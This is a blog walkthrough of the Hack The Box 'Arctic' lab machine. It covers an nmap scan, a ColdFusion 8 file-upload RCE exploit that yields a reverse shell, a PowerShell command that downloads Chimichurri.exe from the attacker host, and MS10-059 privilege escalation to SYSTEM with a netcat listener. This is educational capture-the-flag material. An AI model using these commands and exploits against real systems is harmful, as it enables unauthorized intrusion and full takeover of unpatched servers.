Hack The Box RCE

Hack The Box: Arctic Walkthrough

Author
Dulanjana Fernando
Aug 19, 2026  •  6 min read  •  139 views
Hack The Box: Arctic Walkthrough

Arctic is a HackTheBox easy Microsoft Windows Server 2008 machine that is running Adobe ColdFusion 8. The initial foothold involves exploiting an unauthenticated file upload on the legacy web application. The privilege escalation involves abusing token impersonation privileges on an unpatched Windows Server build to achieve full administrative access.

1. Initial Enumeration and Service Discovery

As the first step, I ran an NMAP scan on the target machine to get a better idea of the target machine. I used nmap -sC -sV -O arctic.htb -oN nmap_scan to scan the open ports and services.

nmap -sC -sV -O arctic.htb -oN nmap_scan
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-18 07:09 -0400
Nmap scan report for arctic.htb (10.129.3.136)
Host is up (0.49s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
|_http-title: Index of /
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|11|Phone|Vista|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.50 seconds

Based on the NMAP scan results, the target machine has 3 ports open.

  • Port 135 - Microsoft Windows RPC
  • Port 8500 - Running a JRun Web Server
  • Port 49154 - Another Microsoft Windows RPC service

By enumerating the web service running on port 8500, I discovered that the browser is displaying the open directory listing. Further enumeration revealed an Adobe ColdFusion 8 administration directory at http://arctic.htb:8500/CFIDE/administrator/.

2. Initial Access - Adobe ColdFusion 8 RCE

Searching for publicly available exploits for Adobe ColdFusion 8, I found that ExploitDB has an unauthenticated arbitrary file upload vulnerability that can be used to get Remote Code Execution(RCE) on the target machine.

Adobe ColdFusion 8 - Remote Command Execution (RCE)

python3 50057.py
Generating a payload...
Payload size: 1497 bytes
Saved as: 4c338019e54e479aa8fe2a61f46bc925.jsp

Priting request...
Content-type: multipart/form-data; boundary=72167926f6e6419e84c03de28dc7fddb
Content-length: 1698

--72167926f6e6419e84c03de28dc7fddb
Content-Disposition: form-data; name="newfile"; filename="4c338019e54e479aa8fe2a61f46bc925.txt"
Content-Type: text/plain

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
.
.
.
connect to [10.10.16.36] from (UNKNOWN) [10.129.3.136] 49386
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

C:\ColdFusion8\runtime\bin>cd C:\Users\tolis\Desktop
cd C:\Users\tolis\Desktop

C:\Users\tolis\Desktop>type user.txt
type user.txt

By editing and running the exploit, I was able to get a foothold as arctic\tolis on the target machine.

3. Privilege Escalation - SeImpersonatePrivilege & Chimichurri

3.1 Local System Enumeration

After establishing a foothold, I started to enumerate the target machine to find a way to escalate privileges. I started by running systeminfo to get an understanding of the OD version, build and installed security patches.

C:\Users\tolis\Desktop>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ��
System Boot Time:          18/8/2026, 9:55:57 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     6.143 MB
Available Physical Memory: 5.092 MB
Virtual Memory: Max Size:  12.285 MB
Virtual Memory: Available: 11.256 MB
Virtual Memory: In Use:    1.029 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.10.2
                                 IP address(es)
                                 [01]: 10.129.3.136

Based on the results, the target machine is running Microsoft Windows Server 2008 R2 Standard Build 7600 with no hotfixes installed. This means it is highly likely that the OS has unpatched vulnerabilities.

Next, I inspected the user privileges my current user arctic\tolis has on the target machine by running whoami /all.

C:\Users\tolis\Desktop>whoami /all
whoami /all

USER INFORMATION
----------------

User Name    SID                                          
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

I noticed the user has the SeImpersonatePrivilege privilege enabled. In theory, by combining the unpatched operating system and this enabled privilege, I should be able to escalate privileges.

3.2 Privilege Escalation Path Identification

To identify the privilege escalation paths, I used Windows Exploit Suggester - Next Generation (WES-NG).

python3 wes.py ~/Projects/htb/arctic/systeminfo.txt -i "Elevation of Privilege" | grep -B 7 -A 1 "exploits/"
CVE: CVE-2010-2554
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://exploit-db.com/exploits/14610

--
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://isc.sans.edu/diary.html?storyid=9988, http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

--
CVE: CVE-2010-3338
KB: KB2305420
Title: Vulnerability in Task Scheduler Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://exploit-db.com/exploits/19930, https://exploit-db.com/exploits/15589

--
CVE: CVE-2011-0045
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://exploit-db.com/exploits/16262

--
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://exploit-db.com/exploits/24485, https://exploit-db.com/exploits/27296

--
CVE: CVE-2012-0217
KB: KB2709715
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://exploit-db.com/exploits/20861

--
CVE: CVE-2011-1984
KB: KB2571621
Title: Vulnerability in WINS Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://exploit-db.com/exploits/17831

I decided to use the Microsoft Windows - Tracing Registry Key ACL Privilege Escalation exploit from Exploit DB, CVE-2010-2554(MS10-059).

3.3 How MS10-059(Chimichurri) Works

For the Chimichurri exploit to successfully escalate privileges, it needs to be executed by a user who has SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) privilege granted.

Windows assigns SeImpersonatePrivilege to administrative and service accounts so they can act on behalf of other client users or system components. When enabled, a process holding this privilege can capture and impersonate security tokens belonging to any process or client that connects to it.

In Windows Server 2008 R2, the Windows Service Tracing mechanism uses registry entries to define log files for active system services. Because these registry keys suffer from weak permission configurations, an unprivileged user holding SeImpersonatePrivilege can modify the tracing registry paths to point toward a local loopback socket managed by an exploit.

3.4 Privilege Escalation

I was able to find already compiled binary MS10-059: Chimichurri and transferred it to the target machine.


powershell -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.36:8000/Chimichurri.exe', 'C:\Users\tolis\Desktop\Chimichurri.exe')"

As explained in the screenshot , the Chimichurri.exe creates a reverse shell connection, and I need to catch the reverse shell connection from my attacker machine.

# Executing Chimichurri.exe
C:\Users\tolis\Desktop>.\Chimichurri.exe 10.10.16.36 4445
.\Chimichurri.exe 10.10.16.36 4445
/Chimichurri/-->This exploit gives you a Local System shell 
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
C:\Users\tolis\Desktop>

nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.16.36] from (UNKNOWN) [10.129.3.136] 49746
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Desktop>whoami
whoami
nt authority\system

C:\Users\tolis\Desktop>cd ../../Administrator/Desktop
cd ../../Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt

I was able to catch the reverse shell as nt authority\system and access the root flag.


Congrats! We found both flags!

HTB Machine Completion

Tags:
RCE Adobe Coldfusion 8 Chimichurri

You might also like...

Hack The Box: TwoMillion Walkthrough
Hack The Box Intro to Red Team Track
Hack The Box: TwoMillion Walkthrough

TwoMillion is an easy-difficulty HackTheBox machine that begins with reverse eng...

Read More
Hack The Box: Cicada Walkthrough
Hack The Box Intro to Red Team Track
Hack The Box: Cicada Walkthrough

Cicada is an easy-difficulty HackTheBox machine that hosts a Windows Active Dire...

Read More
Hack The Box: Layover Walkthrough
Hack The Box Special Season: Aero
Hack The Box: Layover Walkthrough

Layover is a Medium difficulty HackTheBox machine that is part of Season 12....

Read More

Stay Updated

Get notified when new walkthroughs and security articles are published.